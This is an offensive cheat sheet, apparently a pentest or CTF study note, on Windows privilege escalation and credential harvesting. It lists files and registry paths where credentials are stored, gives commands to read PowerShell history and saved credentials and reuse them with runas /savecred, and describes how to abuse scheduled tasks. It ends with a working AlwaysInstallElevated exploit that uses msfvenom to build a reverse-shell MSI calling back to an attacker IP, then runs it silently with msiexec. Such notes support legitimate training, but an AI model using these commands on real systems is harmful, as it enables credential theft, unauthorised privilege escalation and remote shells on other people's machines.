Unattended Windows Installations - might contain credentials


    C:\Unattend.xml
    C:\Windows\Panther\Unattend.xml
    C:\Windows\Panther\Unattend\Unattend.xml
    C:\Windows\system32\sysprep.inf
    C:\Windows\system32\sysprep\sysprep.xml



-------------------------------------------------------------------------

POWERSHELL HISTORY

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt


-------------------------------------------------------------------------

SAVED WINDOWS CREDENTIALS

cmdkey /list

OR

runas /savecred /user:admin cmd.exe 

runas /savecred /user:[USERNAME] cmd.exe

--------------------------------------------------------------------------

IIS Configuration

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

--------------------------------------------------------------------------

Retrieve Credentials from Software: PuTTY

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

--------------------------------------------------------------------------

SCHEDULED TASKS

schtasks (command)

schtasks /query /tn [TASK_NAME] /fo list /v

icacls [TASK_NAME] (checks for permissions, if the current user can modify/overwrite)


if possible, process can be expedited with:

schtasks /run /tn [TASK_NAME]



--------------------------------------------------------------------------

AlwaysInstallElevated

if both registries are set:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

then it is exploitable with:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi
msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi 

--------------------------------------------------------------------------







